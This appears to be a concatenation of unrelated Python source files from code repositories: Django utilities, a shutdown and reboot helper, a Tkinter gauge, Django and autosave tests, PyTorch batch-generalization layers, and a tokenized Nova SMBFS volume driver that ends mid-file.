| 2.859375 | 3 |
utils/snippets.py | NumanIbnMazid/invoice_management | 0 | 12786279 | import random
import string
import time
from django.utils.text import slugify
from urllib.parse import urlparse
from django.db import models
from django.dispatch import receiver
import uuid
# PDF imports
from io import BytesIO
from django.http import HttpResponse
from django.template.loader import get_template
from xhtml2pdf import pisa
import pdfkit
def random_string_generator(size=4, chars=string.ascii_lowercase + string.digits):
"""[Generates random string]
Args:
size (int, optional): [size of string to generate]. Defaults to 4.
chars ([str], optional): [characters to use]. Defaults to string.ascii_lowercase+string.digits.
Returns:
[str]: [Generated random string]
"""
return ''.join(random.choice(chars) for _ in range(size))
def random_number_generator(size=4, chars='1234567890'):
"""[Generates random number]
Args:
size (int, optional): [size of number to generate]. Defaults to 4.
chars (str, optional): [numbers to use]. Defaults to '1234567890'.
Returns:
[str]: [Generated random number]
"""
return ''.join(random.choice(chars) for _ in range(size))
def simple_random_string():
"""[Generates simple random string]
Returns:
[str]: [Generated random string]
"""
timestamp_m = time.strftime("%Y")
timestamp_d = time.strftime("%m")
timestamp_y = time.strftime("%d")
timestamp_now = time.strftime("%H%M%S")
random_str = random_string_generator()
random_num = random_number_generator()
bindings = (
random_str + timestamp_d + random_num + timestamp_now +
timestamp_y + random_num + timestamp_m
)
return bindings
def simple_random_string_with_timestamp(size=None):
"""[Generates random string with timestamp]
Args:
size ([int], optional): [Size of string]. Defaults to None.
Returns:
[str]: [Generated random string]
"""
timestamp_m = time.strftime("%Y")
timestamp_d = time.strftime("%m")
timestamp_y = time.strftime("%d")
random_str = random_string_generator()
random_num = random_number_generator()
bindings = (
random_str + timestamp_d + timestamp_m + timestamp_y + random_num
)
if not size == None:
return bindings[0:size]
return bindings
def unique_slug_generator(instance, field=None, new_slug=None):
"""[Generates unique slug]
Args:
instance ([Model Class instance]): [Django Model class object instance].
field ([Django Model Field], optional): [Django Model Class Field]. Defaults to None.
new_slug ([str], optional): [passed new slug]. Defaults to None.
Returns:
[str]: [Generated unique slug]
"""
if field == None:
field = instance.title
if new_slug is not None:
slug = new_slug
else:
slug = slugify(field[:50])
Klass = instance.__class__
qs_exists = Klass.objects.filter(slug=slug).exists()
if qs_exists:
new_slug = "{slug}-{randstr}".format(
slug=slug,
randstr=random_string_generator(size=4)
)
return unique_slug_generator(instance, new_slug=new_slug)
return slug
def url_check(url):
"""[Checks if a provided string is URL or Not]
Args:
url ([str]): [URL String]
Returns:
[bool]: [returns True if provided string is URL, otherwise returns False]
"""
min_attr = ('scheme', 'netloc')
try:
result = urlparse(url)
if all([result.scheme, result.netloc]):
return True
else:
return False
except:
return False
def autoUniqueIdWithField(fieldname):
"""[Generates auto slug integrating model's field value and UUID]
Args:
fieldname ([str]): [Model field name to use to generate slug]
"""
def decorator(model):
# some sanity checks first
assert hasattr(model, fieldname), f"Model has no field {fieldname}"
assert hasattr(model, "slug"), "Model is missing a slug field"
@receiver(models.signals.pre_save, sender=model, weak=False)
def generate_unique_id(sender, instance, *args, raw=False, **kwargs):
if not raw and not getattr(instance, fieldname):
source = getattr(instance, fieldname)
def generate():
uuid = random_number_generator(size=12)
Klass = instance.__class__
qs_exists = Klass.objects.filter(uuid=uuid).exists()
if qs_exists:
generate()
else:
instance.uuid = uuid
pass
# generate uuid
generate()
return model
return decorator
def autoslugWithFieldAndUUID(fieldname):
"""[Generates auto slug integrating model's field value and UUID]
Args:
fieldname ([str]): [Model field name to use to generate slug]
"""
def decorator(model):
# some sanity checks first
assert hasattr(model, fieldname), f"Model has no field {fieldname}"
assert hasattr(model, "slug"), "Model is missing a slug field"
@receiver(models.signals.pre_save, sender=model, weak=False)
def generate_slug(sender, instance, *args, raw=False, **kwargs):
if not raw and not instance.slug:
source = getattr(instance, fieldname)
try:
slug = slugify(source)[:123] + "-" + str(uuid.uuid4())
Klass = instance.__class__
qs_exists = Klass.objects.filter(slug=slug).exists()
if qs_exists:
new_slug = "{slug}-{randstr}".format(
slug=slug,
randstr=random_string_generator(size=4)
)
instance.slug = new_slug
else:
instance.slug = slug
except Exception as e:
instance.slug = simple_random_string()
return model
return decorator
def autoslugFromField(fieldname):
"""[Generates auto slug from model's field value]
Args:
fieldname ([str]): [Model field name to use to generate slug]
"""
def decorator(model):
# some sanity checks first
assert hasattr(model, fieldname), f"Model has no field {fieldname!r}"
assert hasattr(model, "slug"), "Model is missing a slug field"
@receiver(models.signals.pre_save, sender=model, weak=False)
def generate_slug(sender, instance, *args, raw=False, **kwargs):
if not raw and not instance.slug:
source = getattr(instance, fieldname)
try:
slug = slugify(source)
Klass = instance.__class__
qs_exists = Klass.objects.filter(slug=slug).exists()
if qs_exists:
new_slug = "{slug}-{randstr}".format(
slug=slug,
randstr=random_string_generator(size=4)
)
instance.slug = new_slug
else:
instance.slug = slug
except Exception as e:
instance.slug = simple_random_string()
return model
return decorator
def autoslugFromUUID():
"""[Generates auto slug using UUID]
"""
def decorator(model):
assert hasattr(model, "slug"), "Model is missing a slug field"
@receiver(models.signals.pre_save, sender=model, weak=False)
def generate_slug(sender, instance, *args, raw=False, **kwargs):
if not raw and not instance.slug:
try:
instance.slug = str(uuid.uuid4())
except Exception as e:
instance.slug = simple_random_string()
return model
return decorator
def generate_unique_username_from_email(instance):
"""[Generates unique username from email]
Args:
instance ([model class object instance]): [model class object instance]
Raises:
ValueError: [If found invalid email]
Returns:
[str]: [unique username]
"""
# get email from instance
email = instance.email
if not email:
raise ValueError("Invalid email!")
def generate_username(email):
return email.split("@")[0][:15] + "__" + simple_random_string_with_timestamp(size=5)
generated_username = generate_username(email=email)
Klass = instance.__class__
qs_exists = Klass.objects.filter(username=generated_username).exists()
if qs_exists:
# recursive call
generate_unique_username_from_email(instance=instance)
return generated_username
def render_to_pdf(template_src, context_dict={}):
"""[summary]
Args:
template_src ([str]): [path of html file to render]
context_dict (dict, optional): [additional contexts]. Defaults to {}.
Returns:
[HttpResponse/None]: [Django HttpResponse object or None]
"""
template = get_template(template_src)
html = template.render(context_dict)
result = BytesIO()
pdf = pisa.pisaDocument(BytesIO(html.encode("ISO-8859-1")), result)
if not pdf.err:
return HttpResponse(result.getvalue(), content_type='application/pdf')
return None
def render_template(template_src, context_dict={}):
"""[summary]
Args:
template_src ([str]): [path of html file to render]
context_dict (dict, optional): [additional contexts]. Defaults to {}.
Returns:
[HttpResponse/None]: [Django HttpResponse object or None]
"""
template = get_template(template_src)
html = template.render(context_dict)
return html
def generate_pdf_with_pdfkit(template_src=None, context=None, options=None, css=[], filename="Download.pdf"):
try:
if not options:
options = {
'page-size': 'Letter',
'margin-top': '0.75in',
'margin-right': '0.75in',
'margin-bottom': '0.75in',
'margin-left': '0.75in',
'encoding': "UTF-8",
'custom-header': [
('Accept-Encoding', 'gzip')
],
'cookie': [
('cookie-empty-value', '""')
],
'no-outline': None
}
template = render_template(template_src=template_src, context_dict=context)
pdf = pdfkit.from_string(
template, options=options, css=css
)
response = HttpResponse(pdf, content_type='application/pdf')
response['Content-Disposition'] = 'attachment; filename="' + filename + '"'
return response
except Exception as E:
return HttpResponse(str(E), content_type='text/plain')
| 2.46875 | 2 |
program/tools.py | techtuxbr/WatchDogs | 6 | 12786280 | import os
from . import computer
def shutdown():
if computer.os() == "Windows":
os.system("shutdown -s")
elif computer.os() == "Linux":
os.system("shutdown -h")
else:
print("Sistema operacional nao detectado, impossivel executar a operacao desejada")
def reboot():
if computer.os() == "Windows":
os.system("shutdown -r")
elif computer.os() == "Linux":
os.system("shutdown -r")
else:
print("Sistema operacional nao detectado, impossivel executar a operacao desejada") | 3.34375 | 3 |
TeLoRa_v0_03/test_code/Gauge.py | OHAProject/LoRa-tracker | 0 | 12786281 | # -*- coding: utf-8 -*-
import Tkinter
import time
from random import randrange
class Mod_gauge(Tkinter.Canvas):
def __init__(self, parent, titre = "Gauge",background="#222735",foreground="#00d0c7", max = 127, min = 0):
global valeur, root, arc, text, H, W, coord1, coord2
self.titre = titre
root = parent
valeur = 0.
H=290
W=260
coord1 = (H-240), (W-215), (H-80), (W-50)
coord2 = (H-270), (W-240), (H-50), (W-20)
Tkinter.Canvas.__init__(self, bg="#FF2E2E", height=H, width=W)
# Dessin de la gauge
self.create_oval(coord1, fill="#FF2E2E", outline="#FF8B8B")
#self.create_oval(coord1, outline="#3399FF")
arc = self.create_arc(coord2, start=90, extent = valeur, fill="#FF8B8B",outline="#FF8B8B")
self.create_oval(coord2, outline="#FF8B8B")
text = self.create_text(130, 130, text=int(valeur), font="Arial 40 italic", fill="#FF8B8B")
legende = self.create_text(130, 260, text= self.titre, font="Arial 20 ", fill="#FF8B8B")
parent.update()
def SetValue(self, consigne):
global valeur, root, arc, text
parent = root
consigne =(entree*100)/self.max
while (int(valeur) != int(consigne*3.6)):
if (int(valeur) < int(consigne*3.6)):
valeur = valeur + 1
txt_consigne = valeur/3.6
self.delete(arc)
self.delete(text)
arc = self.create_arc(coord2, start=90, extent=-valeur, fill="#FF8B8B")
self.create_oval(coord2, outline="#FF8B8B")
self.create_oval(coord1, fill="#FF2E2E", outline="#FF8B8B")
self.create_oval(coord1, outline="#FF8B8B")
text = self.create_text(130, 130, text=int(txt_consigne), font="Arial 40 italic", fill="#FF8B8B")
parent.update()
#time.sleep(0.00002) #Définie l'inertie de la gauge
elif( int(valeur) > int(consigne*3.6)):
valeur = valeur - 1
txt_consigne = valeur/3.6
self.delete(arc)
self.delete(text)
arc = self.create_arc(coord2, start=90, extent=-valeur, fill="#FF8B8B")
self.create_oval(coord2, outline="#FF8B8B")
self.create_oval(coord1, fill="#FF2E2E", outline="#FF8B8B")
self.create_oval(coord1, outline="#FF8B8B")
text = self.create_text(130, 130, text=int(txt_consigne), font="Arial 40 italic", fill="#FF8B8B")
parent.update()
#time.sleep(0.00002) #Définie l'inertie de la gauge
else :
txt_consigne = valeur/3.6
self.delete(arc)
self.delete(text)
arc = self.create_arc(coord2, start=90, extent=-valeur, fill="#FF8B8B")
self.create_oval(coord2, outline="#FF8B8B")
self.create_oval(coord1, fill="#FF2E2E", outline="#FF8B8B")
self.create_oval(coord1, outline="#FF8B8B")
text = self.create_text(130, 130, text=int(txt_consigne), font="Arial 40 italic", fill="#FF8B8B")
parent.update()
#time.sleep(0.00002) #Définie l'inertie de la gauge
def val():
for i in range(1,10):
gauge.SetValue(randrange(100))
if __name__=="__main__":
app=Tkinter.Tk()
gauge=Mod_gauge(app)
gauge.pack()
val()
app.mainloop()
| 2.796875 | 3 |
exer205.py | profnssorg/valmorMantelli1 | 0 | 12786282 | ###Titulo: Reescrever função
###Função: Este programa foi reescrito para adicionar uma mariável
###Autor: <NAME>.
###Data: 24/11/20148
###Versão: 0.0.1
# Entrada dos dados
a = 5
b = 3
c = 4
#Saída de dados
print(a + b + c)
| 2.890625 | 3 |
extra/time_profiling.py | blacknred/pybook | 0 | 12786283 | import time
from decimal import Decimal, getcontext
'''
Ways to count execution time:
- time of whole program: $time python3.8 slow_program.py
- too many info: $python3.8 -m cProfile -s time slow_program.py
- direct time measure with Timing Specific Function(via decorator):
'''
def timeit_wrapper(func):
# pylint: disable=E0602
@wraps(func)
def wrapper(*args, **kwargs):
start = time.perf_counter() # Alternatively, you can use time.process_time()
func_return_val = func(*args, **kwargs)
end = time.perf_counter()
print('{0:<10}.{1:<8} : {2:<8}'.format(
func.__module__, func.__name__, end - start))
return func_return_val
return wrapper
# slow_program.py ------------------------------------------------------------------
@timeit_wrapper
def exp(x):
getcontext().prec += 2
i, lasts, s, fact, num = 0, 0, 1, 1, 1
while s != lasts:
lasts = s
i += 1
fact *= i
num *= x
s += num / fact
getcontext().prec -= 2
return +s
print('{0:<10} {1:<8} {2:^8}'.format('module', 'function', 'time'))
exp(Decimal(150))
exp(Decimal(400))
exp(Decimal(3000))
| 3.6875 | 4 |
books/tests/inventory.py | samweru/bookkeep | 0 | 12786284 | from books.models import *
from freezegun import freeze_time
from django.test import TransactionTestCase
from django.test import TestCase
from django.db import DatabaseError, transaction
from books.controllers.customer import Order as SaleOrder
from books.controllers import accountant as acc
from books.controllers import sale
from books.seeders import sales_order as so
import moment
import json
import unittest
import random
import datetime
import logging
logger = logging.getLogger(__name__)
class InventoryTestCase(TestCase):
def setUp(self):
self.trxNo = acc.getTrxNo("INV")
def test_so(self):
total_price = 0
total_cost = 0
try:
with transaction.atomic():
salesOrder = SaleOrder()
for x in range(2):
units = random.randint(1,10)
cat = so.getCatalogue(created_at=datetime.datetime.now())
stock = so.getStock(cat=cat, trxNo=self.trxNo, created_at=datetime.datetime.now())
salesOrder.addItem(cat=cat, units=units)
total_cost += units * stock.unit_cost
total_price += units * stock.cat.price
self.assertEqual(total_price, salesOrder.getTotalPrice())
self.assertTrue(salesOrder.saveWithTrxNo(self.trxNo))
self.assertEqual(total_cost, salesOrder.getTotalCost())
trx = sale.invoice(order=salesOrder, descr="Stationery")
self.assertTrue(sale.receipt(trxNo=self.trxNo, amt=salesOrder.getTotalPrice()))
except DatabaseError as e:
logger.error(e)
except Exception as e:
logger.error(e)
def tearDown(self):
pass | 2.4375 | 2 |
whatrecord/tests/test_autosave.py | ZLLentz/whatrecord | 2 | 12786285 | <reponame>ZLLentz/whatrecord
import pathlib
import pprint
import apischema
import pytest
from ..autosave import AutosaveRestoreFile, RestoreError, RestoreValue
from ..common import LoadContext
from . import conftest
autosave_FILES = list((conftest.MODULE_PATH / "iocs").glob("**/*.sav"))
additional_files = conftest.MODULE_PATH / "autosave_filenames.txt"
if additional_files.exists():
for additional in open(additional_files, "rt").read().splitlines():
autosave_FILES.append(pathlib.Path(additional))
autosave_files = pytest.mark.parametrize(
"autosave_file",
[
pytest.param(
autosave_file,
id="/".join(autosave_file.parts[-2:])
)
for autosave_file in autosave_FILES
]
)
@autosave_files
def test_parse(autosave_file):
proto = AutosaveRestoreFile.from_file(autosave_file)
serialized = apischema.serialize(proto)
pprint.pprint(serialized)
apischema.deserialize(AutosaveRestoreFile, serialized)
def test_basic():
result = AutosaveRestoreFile.from_string(
"""\
# save/restore V5.1 Automatically generated - DO NOT MODIFY - 130618-005710
! 5 channel(s) not connected - or not all gets were successful
XPP:R30:EVR:27:CTRL.DG0C 119
<END>
""", filename="None")
assert result.comments == [
"save/restore V5.1 Automatically generated - DO NOT MODIFY - 130618-005710",
]
assert result.values == {
"XPP:R30:EVR:27:CTRL": {
"DG0C": RestoreValue(
context=(LoadContext("None", 3), ),
record="XPP:R30:EVR:27:CTRL",
field="DG0C",
pvname="XPP:R30:EVR:27:CTRL.DG0C",
value="119",
)
}
}
assert result.errors == [
RestoreError(
context=(LoadContext("None", 2), ),
number=5,
description="channel(s) not connected - or not all gets were successful",
)
]
def test_basic_array():
result = AutosaveRestoreFile.from_string(
'''\
# save/restore V5.1 Automatically generated - DO NOT MODIFY - 130618-005710
! 5 channel(s) not connected - or not all gets were successful
XPP:R30:EVR:27:CTRL.DG0C @array@ { "500" "0.6" "0" "0" "0" "0" "0" "0" "0"'''
+ ''' "0" "0" "0" "0" "0" "0" "0" "0" "0" "0" "0" "0" "0" "0" "0" "0" }
<END>
''', filename="None"
)
assert result.comments == [
"save/restore V5.1 Automatically generated - DO NOT MODIFY - 130618-005710",
]
assert result.values == {
"XPP:R30:EVR:27:CTRL": {
"DG0C": RestoreValue(
context=(LoadContext("None", 3), ),
record="XPP:R30:EVR:27:CTRL",
field="DG0C",
pvname="XPP:R30:EVR:27:CTRL.DG0C",
value=[
"500", "0.6", "0", "0", "0", "0", "0", "0", "0", "0", "0",
"0", "0", "0", "0", "0", "0", "0", "0", "0", "0", "0", "0",
"0", "0"
]
)
}
}
assert result.errors == [
RestoreError(
context=(LoadContext("None", 2), ),
number=5,
description="channel(s) not connected - or not all gets were successful",
)
]
def test_basic_empty_value():
result = AutosaveRestoreFile.from_string(
"""XPP:R30:EVR:27:CTRL.DG0C \n<END>""", filename="None"
)
assert result.values == {
"XPP:R30:EVR:27:CTRL": {
"DG0C": RestoreValue(
context=(LoadContext("None", 1), ),
record="XPP:R30:EVR:27:CTRL",
field="DG0C",
pvname="XPP:R30:EVR:27:CTRL.DG0C",
value="",
)
}
}
def test_basic_string():
result = AutosaveRestoreFile.from_string(
r"""
XPP:R30:EVR:27:CTRL.DG0C "a quoted string"
<END>
""", filename="None"
)
assert result.values == {
"XPP:R30:EVR:27:CTRL": {
"DG0C": RestoreValue(
context=(LoadContext("None", 2),),
record="XPP:R30:EVR:27:CTRL",
field="DG0C",
pvname="XPP:R30:EVR:27:CTRL.DG0C",
value="a quoted string",
)
}
}
def test_basic_escaped():
result = AutosaveRestoreFile.from_string(
r"""
CTRL.DG0C a \"quoted\" string
CTRL.DG1C @array@ { "1.23" " 2.34" " 3.45" }
CTRL.DG2C @array@ { "abc" "de\"f" "g{hi\"" "jkl mno} pqr" }
<END>
""", filename="None")
assert result.values == {
"CTRL": {
"DG0C": RestoreValue(
context=(LoadContext("None", 2), ),
record="CTRL",
field="DG0C",
pvname="CTRL.DG0C",
value='a "quoted" string',
),
"DG1C": RestoreValue(
context=(LoadContext("None", 3), ),
record="CTRL",
field="DG1C",
pvname="CTRL.DG1C",
value=["1.23", " 2.34", " 3.45"],
),
"DG2C": RestoreValue(
context=(LoadContext("None", 4), ),
record="CTRL",
field="DG2C",
pvname="CTRL.DG2C",
value=["abc", 'de"f', 'g{hi"', "jkl mno} pqr"],
),
}
}
def test_basic_disconnected():
result = AutosaveRestoreFile.from_string(
r"""
XPP:R30:EVR:27:CTRL.DG0C a \"quoted\" string
#abc Search Issued
#def Search Issued
XPP:R30:EVR:27:CTRL.DG1C an unquoted string
#ghi Search Issued
<END>
""")
assert result.disconnected == [
"abc",
"def",
"ghi",
]
| 1.984375 | 2 |
rbg/generalization.py | bottlenome/rbg | 0 | 12786286 | import torch
import torch.nn as nn
import torch.nn.functional as F
from .function import onehot, onehot_cross
class random_batch_generalization_abs(torch.autograd.Function):
@staticmethod
def forward(ctx, x, y, rate, epsilon):
batch_size = x.shape[0]
ref_index = torch.randint(low=0, high=batch_size - 1,
size=(int(batch_size * rate), ))
target_index = torch.randint(low=0, high=batch_size - 1,
size=(int(batch_size * rate), ))
mag = torch.empty(len(ref_index)).normal_(mean=0.0, std=epsilon)
mag = mag.abs()
ctx.save_for_backward(x, ref_index, target_index, mag)
ret = x.clone()
ret_y = y.clone()
for i in range(len(ref_index)):
ret[ref_index[i]] = (x[target_index[i]] * mag[i]
+ x[ref_index[i]] * (1 - mag[i]))
total = (mag[i].abs() + (1 - mag[i]).abs())
target_p = mag[i].abs() / total
ref_p = (1 - mag[i]).abs() / total
ret_y[target_index[i]] += y[ref_index[i]] * target_p
ret_y[ref_index[i]] = y[ref_index[i]] * ref_p
return ret, ret_y
@staticmethod
def backward(ctx, grad_output, _):
x, ref_index, target_index, mag = ctx.saved_tensors
grad_input = grad_output.clone()
for i in range(len(ref_index)):
ref = grad_input[ref_index[i]]
# dL/da = dL/dy * dy/da
grad_input[ref_index[i]] = ref * (1 - mag[i])
# dL/db = dL/dy * dy/db
grad_input[target_index[i]] += ref * mag[i]
return grad_input, None, None, None
class random_batch_generalization(torch.autograd.Function):
@staticmethod
def forward(ctx, x, y, rate, epsilon):
batch_size = x.shape[0]
ref_index = torch.randint(low=0, high=batch_size - 1,
size=(int(batch_size * rate), ))
target_index = torch.randint(low=0, high=batch_size - 1,
size=(int(batch_size * rate), ))
mag = torch.empty(len(ref_index)).normal_(mean=0.0, std=epsilon)
ctx.save_for_backward(x, ref_index, target_index, mag)
ret = x.clone()
ret_y = y.clone()
for i in range(len(ref_index)):
ret[ref_index[i]] = (x[target_index[i]] * mag[i]
+ x[ref_index[i]] * (1 - mag[i]))
total = (mag[i].abs() + (1 - mag[i]).abs())
target_p = mag[i].abs() / total
ref_p = (1 - mag[i]).abs() / total
ret_y[target_index[i]] += y[ref_index[i]] * target_p
ret_y[ref_index[i]] = y[ref_index[i]] * ref_p
return ret, ret_y
@staticmethod
def backward(ctx, grad_output, _):
x, ref_index, target_index, mag = ctx.saved_tensors
grad_input = grad_output.clone()
for i in range(len(ref_index)):
ref = grad_input[ref_index[i]]
# dL/da = dL/dy * dy/da
grad_input[ref_index[i]] = ref * (1 - mag[i])
# dL/db = dL/dy * dy/db
grad_input[target_index[i]] += ref * mag[i]
return grad_input, None, None, None
class RandomBatchGeneralization(nn.Module):
def __init__(self, rate=0.1, epsilon=0.4, abs_mag=False):
super().__init__()
self.epsilon = epsilon
self.rate = rate
if abs_mag:
self.forward_ = random_batch_generalization.apply
else:
self.forward_ = random_batch_generalization_abs.apply
def forward(self, x, y):
if self.training:
return self.forward_(x, y, self.rate, self.epsilon)
else:
return x, y
class batch_generalization(torch.autograd.Function):
@staticmethod
def forward(ctx, x, y, rate, epsilon):
batch_size = x.shape[0]
ref_index = torch.randint(low=0, high=batch_size - 1,
size=(int(batch_size * rate), ))
target_index = torch.zeros(ref_index.shape, dtype=torch.int)
for i in range(len(ref_index)):
same_label = torch.where(y == y[ref_index[i]])[0]
j = torch.randint(low=0, high=len(same_label), size=(1,))
target_index[i] = same_label[j[0]]
mag = torch.empty(len(ref_index)).normal_(mean=0.0, std=epsilon)
ret = x.clone()
for i in range(len(ref_index)):
ret[ref_index[i]] = (x[target_index[i]] * mag[i]
+ x[ref_index[i]] * (1 - mag[i]))
# ctx.save_for_backward(x, ref_index, target_index, mag)
ctx.save_for_backward(ref_index, target_index, mag)
return ret
@staticmethod
def backward(ctx, grad_output):
# x, ref_index, target_index, mag = ctx.saved_tensors
ref_index, target_index, mag = ctx.saved_tensors
grad_input = grad_output.clone()
for i in range(len(ref_index)):
ref = grad_input[ref_index[i]]
# dL/da = dL/dy * dy/da
grad_input[ref_index[i]] = ref * (1 - mag[i])
# dL/db = dL/dy * dy/db
grad_input[target_index[i]] += ref * mag[i]
return grad_input, None, None, None
class BatchGeneralization(nn.Module):
def __init__(self, rate=0.1, epsilon=0.4):
super().__init__()
self.epsilon = epsilon
self.rate = rate
self.forward_ = batch_generalization.apply
def forward(self, x, y):
if self.training:
return self.forward_(x, y, self.rate, self.epsilon)
else:
return x
class GeneralizationDoNothing(nn.Module):
def __init__(self, rate=0.1, epsilon=0.4):
super().__init__()
def forward(self, x, y):
return x
if __name__ == '__main__':
import time
def profile(func, x, y):
start = time.perf_counter()
ret = func(x, y)
end = time.perf_counter()
print("{}, {} ms".format(str(func), (end - start) * 1000))
return ret
x = torch.rand((100, 3, 256, 256), requires_grad=True)
y = torch.randint(low=0, high=9, size=(100,))
r = RandomBatchGeneralization(rate=0.5)
ret_x, ret_y = profile(r, x, onehot(y, 10))
ret_x.sum().backward()
print(ret_y[:10])
print(ret_y.shape)
# profile(r.cuda(), x.cuda())
r = BatchGeneralization()
ret = profile(r, x, y)
ret.sum().backward()
output = torch.rand((100, 10), requires_grad=True)
loss = onehot_cross(output, onehot(y, 10))
print(loss)
loss.backward()
loss = torch.nn.functional.cross_entropy(output, y)
print(loss)
loss = onehot_cross(output, ret_y)
print(loss)
| 2.09375 | 2 |
nova/virt/libvirt/volume/smbfs.py | bopopescu/nova-token | 0 | 12786287 | begin_unit
comment|'# Licensed under the Apache License, Version 2.0 (the "License"); you may'
nl|'\n'
comment|'# not use this file except in compliance with the License. You may obtain'
nl|'\n'
comment|'# a copy of the License at'
nl|'\n'
comment|'#'
nl|'\n'
comment|'# http://www.apache.org/licenses/LICENSE-2.0'
nl|'\n'
comment|'#'
nl|'\n'
comment|'# Unless required by applicable law or agreed to in writing, software'
nl|'\n'
comment|'# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT'
nl|'\n'
comment|'# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the'
nl|'\n'
comment|'# License for the specific language governing permissions and limitations'
nl|'\n'
comment|'# under the License.'
nl|'\n'
nl|'\n'
name|'import'
name|'re'
newline|'\n'
nl|'\n'
name|'import'
name|'nova'
op|'.'
name|'conf'
newline|'\n'
name|'from'
name|'nova'
op|'.'
name|'virt'
op|'.'
name|'libvirt'
name|'import'
name|'utils'
name|'as'
name|'libvirt_utils'
newline|'\n'
name|'from'
name|'nova'
op|'.'
name|'virt'
op|'.'
name|'libvirt'
op|'.'
name|'volume'
name|'import'
name|'fs'
newline|'\n'
name|'from'
name|'nova'
op|'.'
name|'virt'
op|'.'
name|'libvirt'
op|'.'
name|'volume'
name|'import'
name|'remotefs'
newline|'\n'
nl|'\n'
DECL|variable|CONF
name|'CONF'
op|'='
name|'nova'
op|'.'
name|'conf'
op|'.'
name|'CONF'
newline|'\n'
nl|'\n'
DECL|variable|USERNAME_REGEX
name|'USERNAME_REGEX'
op|'='
name|'re'
op|'.'
name|'compile'
op|'('
string|'r"(user(?:name)?)=(?:[^ ,]+\\\\)?([^ ,]+)"'
op|')'
newline|'\n'
nl|'\n'
nl|'\n'
DECL|class|LibvirtSMBFSVolumeDriver
name|'class'
name|'LibvirtSMBFSVolumeDriver'
op|'('
name|'fs'
op|'.'
name|'LibvirtBaseFileSystemVolumeDriver'
op|')'
op|':'
newline|'\n'
indent|' '
string|'"""Class implements libvirt part of volume driver for SMBFS."""'
newline|'\n'
nl|'\n'
DECL|member|_get_mount_point_base
name|'def'
name|'_get_mount_point_base'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'return'
name|'CONF'
op|'.'
name|'libvirt'
op|'.'
name|'smbfs_mount_point_base'
newline|'\n'
nl|'\n'
DECL|member|get_config
dedent|''
name|'def'
name|'get_config'
op|'('
name|'self'
op|','
name|'connection_info'
op|','
name|'disk_info'
op|')'
op|':'
newline|'\n'
indent|' '
string|'"""Returns xml for libvirt."""'
newline|'\n'
name|'conf'
op|'='
name|'super'
op|'('
name|'LibvirtSMBFSVolumeDriver'
op|','
nl|'\n'
name|'self'
op|')'
op|'.'
name|'get_config'
op|'('
name|'connection_info'
op|','
name|'disk_info'
op|')'
newline|'\n'
nl|'\n'
name|'conf'
op|'.'
name|'source_type'
op|'='
string|"'file'"
newline|'\n'
name|'conf'
op|'.'
name|'driver_cache'
op|'='
string|"'writethrough'"
newline|'\n'
name|'conf'
op|'.'
name|'source_path'
op|'='
name|'connection_info'
op|'['
string|"'data'"
op|']'
op|'['
string|"'device_path'"
op|']'
newline|'\n'
name|'conf'
op|'.'
name|'driver_format'
op|'='
name|'connection_info'
op|'['
string|"'data'"
op|']'
op|'.'
name|'get'
op|'('
string|"'format'"
op|','
string|"'raw'"
op|')'
newline|'\n'
name|'return'
name|'conf'
newline|'\n'
nl|'\n'
DECL|member|connect_volume
dedent|''
name|'def'
name|'connect_volume'
op|'('
name|'self'
op|','
name|'connection_info'
op|','
name|'disk_info'
op|')'
op|':'
newline|'\n'
indent|' '
string|'"""Connect the volume."""'
newline|'\n'
name|'smbfs_share'
op|'='
name|'connection_info'
op|'['
string|"'data'"
op|']'
op|'['
string|"'export'"
op|']'
newline|'\n'
name|'mount_path'
op|'='
name|'self'
op|'.'
name|'_get_mount_path'
op|'('
name|'connection_info'
op|')'
newline|'\n'
nl|'\n'
name|'if'
name|'not'
name|'libvirt_utils'
op|'.'
name|'is_mounted'
op|'('
name|'mount_path'
op|','
name|'smbfs_share'
op|')'
op|':'
newline|'\n'
indent|' '
name|'mount_options'
op|'='
name|'self'
op|'.'
name|'_parse_mount_options'
op|'('
name|'connection_info'
op|')'
newline|'\n'
name|'remotefs'
op|'.'
name|'mount_share'
op|'('
name|'mount_path'
op|','
name|'smbfs_share'
op|','
nl|'\n'
name|'export_type'
op|'='
string|"'cifs'"
op|','
name|'options'
op|'='
name|'mount_options'
op|')'
newline|'\n'
nl|'\n'
dedent|''
name|'device_path'
op|'='
name|'self'
op|'.'
name|'_get_device_path'
op|'('
name|'connection_info'
op|')'
newline|'\n'
name|'connection_info'
op|'['
string|"'data'"
op|']'
op|'['
string|"'device_path'"
op|']'
op|'='
name|'device_path'
newline|'\n'
nl|'\n'
DECL|member|disconnect_volume
dedent|''
name|'def'
name|'disconnect_volume'
op|'('
name|'self'
op|','
name|'connection_info'
op|','
name|'disk_dev'
op|')'
op|':'
newline|'\n'
indent|' '
string|'"""Disconnect the volume."""'
newline|'\n'
name|'smbfs_share'
op|'='
name|'connection_info'
op|'['
string|"'data'"
op|']'
op|'['
string|"'export'"
op|']'
newline|'\n'
name|'mount_path'
op|'='
name|'self'
op|'.'
name|'_get_mount_path'
op|'('
name|'connection_info'
op|')'
newline|'\n'
name|'remotefs'
op|'.'
name|'unmount_share'
op|'('
name|'mount_path'
op|','
name|'smbfs_share'
op|')'
newline|'\n'
nl|'\n'
DECL|member|_parse_mount_options
dedent|''
name|'def'
name|'_parse_mount_options'
op|'('
name|'self'
op|','
name|'connection_info'
op|')'
op|':'
newline|'\n'
indent|' '
name|'mount_options'
op|'='
string|'" "'
op|'.'
name|'join'
op|'('
nl|'\n'
op|'['
name|'connection_info'
op|'['
string|"'data'"
op|']'
op|'.'
name|'get'
op|'('
string|"'options'"
op|')'
name|'or'
string|"''"
op|','
nl|'\n'
name|'CONF'
op|'.'
name|'libvirt'
op|'.'
name|'smbfs_mount_options'
op|']'
op|')'
newline|'\n'
nl|'\n'
name|'if'
name|'not'
name|'USERNAME_REGEX'
op|'.'
name|'findall'
op|'('
name|'mount_options'
op|')'
op|':'
newline|'\n'
indent|' '
name|'mount_options'
op|'='
name|'mount_options'
op|'+'
string|"' -o username=guest'"
newline|'\n'
dedent|''
name|'else'
op|':'
newline|'\n'
comment|'# Remove the Domain Name from user name'
nl|'\n'
indent|' '
name|'mount_options'
op|'='
name|'USERNAME_REGEX'
op|'.'
name|'sub'
op|'('
string|"r'\\1=\\2'"
op|','
name|'mount_options'
op|')'
newline|'\n'
dedent|''
name|'return'
name|'mount_options'
op|'.'
name|'strip'
op|'('
string|'", "'
op|')'
op|'.'
name|'split'
op|'('
string|"' '"
